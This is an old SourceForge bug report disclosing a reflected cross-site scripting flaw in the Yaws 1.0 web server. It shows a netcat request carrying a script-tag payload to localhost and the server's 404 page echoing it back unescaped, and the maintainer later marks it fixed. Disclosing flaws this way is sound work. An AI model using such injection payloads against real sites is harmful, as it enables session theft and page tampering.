Work at SourceForge, help us to make it a better place! We have an immediate need for a Support Technician in our San Francisco or Denver office.

Close

#2 Yaws is vulnerable to XSS

closed-fixed
nobody
None
5
2003-06-02
2003-03-03
Anonymous
No

Yaws is vulnerable to all kind of Cross Site Scripting

$ echo -e 'GET /<script>alert("pouet");</script>
HTTP/1.0\r\n\r\n' | nc localhost 8080
HTTP/1.1 404 Not Found
Connection: close
Server: Yaws/1.0 Yet Another Web Server
Date: Mon, 03 Mar 2003 05:25:42 GMT
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML
2.0//EN"><HTML><HEAD><TITLE>404 Not
Found</TITLE></HEAD><BODY><H1>Not Found</H1>The
requested URL /<script>alert("pouet");</script> was not
found on this server.<P><HR><address> Yaws 1.0 Server
at toto:8080 </address> </BODY></HTML>
$

Discussion

  • Claes Wikstrom
    Claes Wikstrom
    2003-06-02

    • status: open --> closed
     
  • Claes Wikstrom
    Claes Wikstrom
    2003-06-02

    • status: closed --> closed-fixed